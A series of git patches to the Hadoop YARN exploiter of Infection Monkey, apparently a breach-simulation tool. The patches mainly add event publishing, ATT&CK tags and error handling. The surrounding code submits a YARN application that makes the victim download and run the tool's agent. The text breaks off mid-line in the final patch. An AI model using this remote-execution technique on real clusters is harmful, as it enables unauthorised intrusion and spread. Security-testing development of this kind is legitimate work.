From fe864792f3db6b6264c9425a109c3484d7fdc9de Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Tue, 4 Oct 2022 13:05:10 +0200 Subject: [PATCH 01/17] Agent: Publish Propagation and Exploitation events from Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 1b7c54470..4fdd308a2 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -40,11 +40,19 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=False, + ) return self.exploit_result try: monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=False, + ) return self.exploit_result http_path, http_thread = HTTPTools.create_locked_transfer( @@ -58,6 +66,12 @@ class HadoopExploiter(WebRCE): self.add_executed_cmd(command) self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True + + self.publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=True, + ) + self.publish_propagation_event(target=self.host.ip_addr, propagation_success=True) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 9c185a3a785419b33d7b0ee27a07be51bda3c797 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Tue, 4 Oct 2022 16:39:10 +0200 Subject: [PATCH 02/17] Agent: Add tags and error messages in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 4fdd308a2..5a878621e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -5,6 +5,7 @@ """ import json +import logging import posixpath import random import string @@ -12,6 +13,7 @@ import string import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT +from common.tags import T1203_ATTACK_TECHNIQUE_TAG from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE @@ -23,6 +25,10 @@ from infection_monkey.model import ( ) from infection_monkey.utils.commands import build_monkey_commandline +logger = logging.getLogger(__name__) + +HADOOP_EXPLOITER_TAG = "hadoop-exploiter" + class HadoopExploiter(WebRCE): _EXPLOITED_SERVICE = "Hadoop" @@ -40,18 +46,24 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: + self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, + error_message=self.exploit_result.error_message, + tags=(HADOOP_EXPLOITER_TAG,), ) return self.exploit_result try: monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: + self.exploit_result.error_message = f"No coressponding agent found for {self.host}" self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, + error_message=self.exploit_result.error_message, + tags=(HADOOP_EXPLOITER_TAG,), ) return self.exploit_result @@ -70,8 +82,13 @@ class HadoopExploiter(WebRCE): self.publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + ) + self.publish_propagation_event( + target=self.host.ip_addr, + propagation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) - self.publish_propagation_event(target=self.host.ip_addr, propagation_success=True) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 57af6403170901aee898e1698124930682f255c8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 18:26:03 +0000 Subject: [PATCH 03/17] Agent: Use correct publish method names --- monkey/infection_monkey/exploit/hadoop.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 5a878621e..deece024c 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -47,7 +47,7 @@ class HadoopExploiter(WebRCE): self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, @@ -59,7 +59,7 @@ class HadoopExploiter(WebRCE): monkey_path_on_victim = get_agent_dst_path(self.host) except KeyError: self.exploit_result.error_message = f"No coressponding agent found for {self.host}" - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, @@ -79,12 +79,12 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self.publish_exploitation_event( + self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) - self.publish_propagation_event( + self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), From bee1047024bae4a37f00ae95abf412ee092a13b7 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:16:22 +0000 Subject: [PATCH 04/17] Agent: Update hadoop failed event publishing --- monkey/infection_monkey/exploit/hadoop.py | 27 +++++++++++------------ 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index deece024c..743cf793e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -55,22 +55,13 @@ class HadoopExploiter(WebRCE): ) return self.exploit_result - try: - monkey_path_on_victim = get_agent_dst_path(self.host) - except KeyError: - self.exploit_result.error_message = f"No coressponding agent found for {self.host}" - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, - error_message=self.exploit_result.error_message, - tags=(HADOOP_EXPLOITER_TAG,), - ) - return self.exploit_result + monkey_path_on_victim = get_agent_dst_path(self.host) http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG) try: command = self._build_command(monkey_path_on_victim, http_path) @@ -89,13 +80,21 @@ class HadoopExploiter(WebRCE): propagation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) + else: + error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + except requests.RequestException as err: + error_message = str(err) + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() return self.exploit_result - def exploit(self, url, command): + def exploit(self, url: str, command: str): if self._is_interrupted(): self._set_interrupted() return False @@ -104,8 +103,8 @@ class HadoopExploiter(WebRCE): resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT ) - resp = json.loads(resp.content) - app_id = resp["application-id"] + resp_dict = json.loads(resp.content) + app_id = resp_dict["application-id"] # Create a random name for our application in YARN # random.SystemRandom can block indefinitely in Linux From c31aed94eaedfad5a9eec1f7ce31d4d8405052a2 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:30:42 +0000 Subject: [PATCH 05/17] Agent: Move successful explotiation event publish --- monkey/infection_monkey/exploit/hadoop.py | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 743cf793e..c12be142d 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -70,11 +70,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), - ) self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, @@ -120,7 +115,15 @@ class HadoopExploiter(WebRCE): resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) - return resp.status_code == 202 + + success = resp.status_code == 202 + if success: + self._publish_exploitation_event( + target=self.host.ip_addr, + exploitation_success=True, + tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + ) + return success def check_if_exploitable(self, url): try: From 54b551b7287083bd77676326b9f287b4f33a32e1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:43:14 +0000 Subject: [PATCH 06/17] Agent: Update tags for hadoop events --- monkey/infection_monkey/exploit/hadoop.py | 29 ++++++++++++++++------- 1 file changed, 20 insertions(+), 9 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c12be142d..ff6e9274b 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -13,7 +13,11 @@ import string import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT -from common.tags import T1203_ATTACK_TECHNIQUE_TAG +from common.tags import ( + T1203_ATTACK_TECHNIQUE_TAG, + T1210_ATTACK_TECHNIQUE_TAG, + T1570_ATTACK_TECHNIQUE_TAG, +) from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE @@ -28,6 +32,8 @@ from infection_monkey.utils.commands import build_monkey_commandline logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" +EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1570_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): @@ -51,7 +57,7 @@ class HadoopExploiter(WebRCE): target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, - tags=(HADOOP_EXPLOITER_TAG,), + tags=PROPAGATION_TAGS, ) return self.exploit_result @@ -61,7 +67,6 @@ class HadoopExploiter(WebRCE): self.host, str(monkey_path_on_victim), self.agent_binary_repository ) - tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG) try: command = self._build_command(monkey_path_on_victim, http_path) @@ -73,16 +78,22 @@ class HadoopExploiter(WebRCE): self._publish_propagation_event( target=self.host.ip_addr, propagation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + tags=PROPAGATION_TAGS, ) else: error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) - self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + self._publish_exploitation_event( + self.host.ip_addr, False, EXPLOIT_TAGS, error_message + ) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) - self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + self._publish_exploitation_event(self.host.ip_addr, False, EXPLOIT_TAGS, error_message) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -121,7 +132,7 @@ class HadoopExploiter(WebRCE): self._publish_exploitation_event( target=self.host.ip_addr, exploitation_success=True, - tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), + tags=EXPLOIT_TAGS, ) return success From 76ae57281d74a9a7d5b435bde0021a2324d7d812 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 12:25:23 +0000 Subject: [PATCH 07/17] Agent: Use EXPLOIT_TAGS for exploitation event --- monkey/infection_monkey/exploit/hadoop.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index ff6e9274b..7d68798d4 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,7 +57,7 @@ class HadoopExploiter(WebRCE): target=self.host.ip_addr, exploitation_success=False, error_message=self.exploit_result.error_message, - tags=PROPAGATION_TAGS, + tags=EXPLOIT_TAGS, ) return self.exploit_result From 4a0a24dde2153bf8d3d9e4e70e563c1b6105d5d6 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:42:26 +0000 Subject: [PATCH 08/17] Agent: Update hadoop exploiter tags T1570 -> T1105 --- monkey/infection_monkey/exploit/hadoop.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 7d68798d4..c5a8b2cf3 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -14,9 +14,9 @@ import requests from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.tags import ( + T1105_ATTACK_TECHNIQUE_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, - T1570_ATTACK_TECHNIQUE_TAG, ) from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.http_tools import HTTPTools @@ -33,7 +33,7 @@ logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1570_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): From 3e592cfa69229880ba25b0de48b09f1b0cdd531e Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 18:25:40 +0000 Subject: [PATCH 09/17] Agent: Use exploiter tag properties --- monkey/infection_monkey/exploit/hadoop.py | 39 ++++++++--------------- 1 file changed, 14 insertions(+), 25 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c5a8b2cf3..1f5932121 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -9,6 +9,7 @@ import logging import posixpath import random import string +from typing import Tuple import requests @@ -32,8 +33,6 @@ from infection_monkey.utils.commands import build_monkey_commandline logger = logging.getLogger(__name__) HADOOP_EXPLOITER_TAG = "hadoop-exploiter" -EXPLOIT_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) class HadoopExploiter(WebRCE): @@ -44,6 +43,12 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 + def _exploiter_tags(self) -> Tuple[str, ...]: + return (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + + def _propagation_tags(self) -> Tuple[str, ...]: + return (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + def __init__(self): super(HadoopExploiter, self).__init__() @@ -54,10 +59,8 @@ class HadoopExploiter(WebRCE): if not self.vulnerable_urls: self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, + False, error_message=self.exploit_result.error_message, - tags=EXPLOIT_TAGS, ) return self.exploit_result @@ -75,25 +78,15 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_propagation_event( - target=self.host.ip_addr, - propagation_success=True, - tags=PROPAGATION_TAGS, - ) + self._publish_propagation_event(True) else: error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event( - self.host.ip_addr, False, EXPLOIT_TAGS, error_message - ) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) + self._publish_propagation_event(False, error_message=error_message) except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(self.host.ip_addr, False, EXPLOIT_TAGS, error_message) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) + self._publish_propagation_event(False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -129,11 +122,7 @@ class HadoopExploiter(WebRCE): success = resp.status_code == 202 if success: - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=True, - tags=EXPLOIT_TAGS, - ) + self._publish_exploitation_event(True) return success def check_if_exploitable(self, url): From de5d365bb07e8bfce95f18dc846b188e08487bcc Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 18:53:31 +0000 Subject: [PATCH 10/17] Agent: Publish events sooner --- monkey/infection_monkey/exploit/hadoop.py | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 1f5932121..4046a81b1 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,11 +57,7 @@ class HadoopExploiter(WebRCE): urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) self.add_vulnerable_urls(urls, True) if not self.vulnerable_urls: - self.exploit.error_message = f"No vulnerable urls has been found for {self.host}" - self._publish_exploitation_event( - False, - error_message=self.exploit_result.error_message, - ) + self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}" return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) @@ -78,11 +74,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - self._publish_propagation_event(True) - else: - error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" - self._publish_exploitation_event(False, error_message=error_message) - self._publish_propagation_event(False, error_message=error_message) except requests.RequestException as err: error_message = str(err) self._publish_exploitation_event(False, error_message=error_message) @@ -121,8 +112,9 @@ class HadoopExploiter(WebRCE): ) success = resp.status_code == 202 - if success: - self._publish_exploitation_event(True) + message = "" if success else f"Failed to exploit via {url}" + self._publish_exploitation_event(success, error_message=message) + self._publish_propagation_event(success, error_message=message) return success def check_if_exploitable(self, url): From 76a3cb0ba0670bf8e0cd89c9825d47212b6d44bf Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:16:06 +0000 Subject: [PATCH 11/17] Agent: Stamp time before exploit executes --- monkey/infection_monkey/exploit/hadoop.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 4046a81b1..0a5b986a6 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -9,6 +9,7 @@ import logging import posixpath import random import string +from time import time from typing import Tuple import requests @@ -66,8 +67,9 @@ class HadoopExploiter(WebRCE): self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + command = self._build_command(monkey_path_on_victim, http_path) + stamp = time() try: - command = self._build_command(monkey_path_on_victim, http_path) if self.exploit(self.vulnerable_urls[0], command): self.add_executed_cmd(command) @@ -76,8 +78,8 @@ class HadoopExploiter(WebRCE): except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(False, error_message=error_message) - self._publish_propagation_event(False, error_message=error_message) + self._publish_exploitation_event(stamp, False, error_message=error_message) + self._publish_propagation_event(stamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -107,14 +109,15 @@ class HadoopExploiter(WebRCE): self._set_interrupted() return False + stamp = time() resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) success = resp.status_code == 202 message = "" if success else f"Failed to exploit via {url}" - self._publish_exploitation_event(success, error_message=message) - self._publish_propagation_event(success, error_message=message) + self._publish_exploitation_event(stamp, success, error_message=message) + self._publish_propagation_event(stamp, success, error_message=message) return success def check_if_exploitable(self, url): From 8f6df12d9ceb2a5dda9f30da4388287d64de68e9 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 12:58:19 +0200 Subject: [PATCH 12/17] Agent: Modify HadoopExploiter tags to be properties --- monkey/infection_monkey/exploit/hadoop.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 0a5b986a6..18e4d70c6 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -10,7 +10,6 @@ import posixpath import random import string from time import time -from typing import Tuple import requests @@ -44,11 +43,9 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 - def _exploiter_tags(self) -> Tuple[str, ...]: - return (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _exploiter_tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - def _propagation_tags(self) -> Tuple[str, ...]: - return (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _propagation_tags = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) def __init__(self): super(HadoopExploiter, self).__init__() From 8bdb30dcfb4552d0a09090b5959ee51e42f31462 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:05:48 +0200 Subject: [PATCH 13/17] Agent: Rename stamp to timestamp in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 18e4d70c6..9c5805b5e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -65,7 +65,7 @@ class HadoopExploiter(WebRCE): ) command = self._build_command(monkey_path_on_victim, http_path) - stamp = time() + timestamp = time() try: if self.exploit(self.vulnerable_urls[0], command): @@ -75,8 +75,8 @@ class HadoopExploiter(WebRCE): except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(stamp, False, error_message=error_message) - self._publish_propagation_event(stamp, False, error_message=error_message) + self._publish_exploitation_event(timestamp, False, error_message=error_message) + self._publish_propagation_event(timestamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -106,15 +106,15 @@ class HadoopExploiter(WebRCE): self._set_interrupted() return False - stamp = time() + timestamp = time() resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) success = resp.status_code == 202 message = "" if success else f"Failed to exploit via {url}" - self._publish_exploitation_event(stamp, success, error_message=message) - self._publish_propagation_event(stamp, success, error_message=message) + self._publish_exploitation_event(timestamp, success, error_message=message) + self._publish_propagation_event(timestamp, success, error_message=message) return success def check_if_exploitable(self, url): From c02d43556ac5d93d27651a3473f22a96b90c4535 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:14:55 +0200 Subject: [PATCH 14/17] Agent: Make Hadoop tags uppercase --- monkey/infection_monkey/exploit/hadoop.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 9c5805b5e..f9a186bd5 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -43,9 +43,9 @@ class HadoopExploiter(WebRCE): # Random string's length that's used for creating unique app name RAN_STR_LEN = 6 - _exploiter_tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - _propagation_tags = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG) def __init__(self): super(HadoopExploiter, self).__init__() From 25073be9f3945b5caa606cb9b5571acf362f8c62 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Fri, 7 Oct 2022 11:22:27 +0200 Subject: [PATCH 15/17] Agent: Remove adding vulnerable urls in Hadoop Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit --- monkey/infection_monkey/exploit/hadoop.py | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index f9a186bd5..c39533a3a 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -51,11 +51,13 @@ class HadoopExploiter(WebRCE): super(HadoopExploiter, self).__init__() def _exploit_host(self): - # Try to get exploitable url - urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) - self.add_vulnerable_urls(urls, True) - if not self.vulnerable_urls: - self.exploit_result.error_message = f"No vulnerable urls has been found for {self.host}" + # Try to get potential urls + potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS) + if not potential_urls: + self.exploit_result.error_message = ( + f"No potential exploitable urls has been found for {self.host}" + ) + self._publish_exploitation_event(False, error_message=self.exploit_result.error_message) return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) @@ -65,18 +67,12 @@ class HadoopExploiter(WebRCE): ) command = self._build_command(monkey_path_on_victim, http_path) - timestamp = time() try: - if self.exploit(self.vulnerable_urls[0], command): + if self.exploit(potential_urls[0], command): self.add_executed_cmd(command) self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True - - except requests.RequestException as err: - error_message = str(err) - self._publish_exploitation_event(timestamp, False, error_message=error_message) - self._publish_propagation_event(timestamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() From 66f5d7a86a166e5fe932dd329baf4a8892ec23b4 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Fri, 7 Oct 2022 08:35:24 -0400 Subject: [PATCH 16/17] Agent: Remove errant exploitation event from hadoop If no potential URLs are found, then no exploit is attempted, so there's no reason to publish an ExploitationEvent. --- monkey/infection_monkey/exploit/hadoop.py | 1 - 1 file changed, 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index c39533a3a..aeb70513e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -57,7 +57,6 @@ class HadoopExploiter(WebRCE): self.exploit_result.error_message = ( f"No potential exploitable urls has been found for {self.host}" ) - self._publish_exploitation_event(False, error_message=self.exploit_result.error_message) return self.exploit_result monkey_path_on_victim = get_agent_dst_path(self.host) From 7a664218bda857ee3a5e9be963dcce6fe38ea450 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Fri, 7 Oct 2022 14:53:19 +0200 Subject: [PATCH 17/17] Agent: Check all potential urls in Hadoop --- monkey/infection_monkey/exploit/hadoop.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index aeb70513e..f2a65b563 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -67,11 +67,12 @@ class HadoopExploiter(WebRCE): command = self._build_command(monkey_path_on_victim, http_path) try: - - if self.exploit(potential_urls[0], command): - self.add_executed_cmd(command) - self.exploit_result.exploitation_success = True - self.exploit_result.propagation_success = True + for url in 